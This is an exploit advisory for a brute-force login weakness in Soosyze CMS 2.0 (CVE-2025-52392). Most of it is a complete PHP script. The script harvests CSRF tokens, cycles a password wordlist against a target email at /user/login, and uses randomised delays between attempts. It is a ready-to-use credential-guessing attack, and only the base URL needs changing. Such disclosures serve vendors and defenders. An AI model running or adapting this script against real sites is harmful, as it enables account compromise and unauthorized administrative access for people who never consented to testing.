=============================================================================================================================================
| # Title     : Soosyze CMS 2.0 - Authentication Brute Force Vulnerability                                                                  |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |
| # Vendor    : https://github.com/soosyze/soosyze                                                                                          |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/208515/ & 	CVE-2025-52392

[+] Summary    : Soosyze CMS version 2.0 is vulnerable to a brute-force authentication attack due to the absence of rate limiting, CAPTCHA enforcement, and account lockout mechanisms on the login endpoint `/user/login`.
                 An attacker can repeatedly submit authentication requests using a known email address and a password wordlist, allowing unlimited login attempts until valid credentials are discovered.
                 This vulnerability may lead to full account compromise and unauthorized administrative access.

[+] POC:  php poc.php wordlist.txt

<?php

declare(strict_types=1);

error_reporting(E_ALL);
ini_set('display_errors', '1');

$baseUrl      = 'http://localhost:8000';
$loginPath   = '/user/login';
$formUrl     = $baseUrl . $loginPath;

$emailField  = 'email';
$passField   = 'password';
$targetEmail = 'test@test.com';

$defaultWords = [
    '123456',
    'admin',
    'password',
    'qwerty',
    'letmein',
    'admin123',
    'password1'
];

$wordlistFile = $argv[1] ?? null;
$words = $defaultWords;

if ($wordlistFile && is_readable($wordlistFile)) {
    $words = array_map('trim', file($wordlistFile));
}

$cookieFile = tempnam(sys_get_temp_dir(), 'soosyze_');

function curlRequest(string $url, array $options = []): string
{
    $ch = curl_init($url);

    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false,
    ] + $options);

    $response = curl_exec($ch);
    curl_close($ch);

    return $response ?: '';
}

function getLoginForm(string $url, string $cookieFile): string
{
    return curlRequest($url, [
        CURLOPT_COOKIEJAR => $cookieFile,
        CURLOPT_COOKIEFILE => $cookieFile,
    ]);
}

function extractCsrfToken(string $html): array
{
    if (preg_match(
        '/name="([_a-zA-Z0-9:-]*(csrf|token)[_a-zA-Z0-9:-]*)".*?value="([^"]*)"/i',
        $html,
        $m
    )) {
        return [$m[1], $m[3]];
    }
    return ['', ''];
}

function postLogin(
    string $url,
    string $email,
    string $password,
    string $cookieFile,
    string $tokenName,
    string $tokenValue
): string {
    $postData = [
        'email'    => $email,
        'password' => $password
    ];

    if ($tokenName && $tokenValue) {
        $postData[$tokenName] = $tokenValue;
    }

    return curlRequest($url, [
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => http_build_query($postData),
        CURLOPT_COOKIEJAR => $cookieFile,
        CURLOPT_COOKIEFILE => $cookieFile,
        CURLOPT_HTTPHEADER => [
            'Content-Type: application/x-www-form-urlencoded',
            'Origin: ' . parse_url($url, PHP_URL_SCHEME) . '://' . parse_url($url, PHP_URL_HOST),
            'Referer: ' . $url
        ]
    ]);
}

echo "[*] Starting authorized brute-force PoC on {$formUrl}\n";

$attempt = 0;

foreach ($words as $pw) {
    $attempt++;

    $html = getLoginForm($formUrl, $cookieFile);
    [$tokenName, $tokenValue] = extractCsrfToken($html);

    $response = postLogin(
        $formUrl,
        $targetEmail,
        $pw,
        $cookieFile,
        $tokenName,
        $tokenValue
    );

    if (strpos($response, 'redirect') !== false) {
        echo "[+] Password FOUND: {$pw} (attempt {$attempt})\n";
        break;
    }

    echo "[-] Attempt {$attempt}: {$pw}\n";

    usleep(random_int(100000, 900000));
}

@unlink($cookieFile);

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================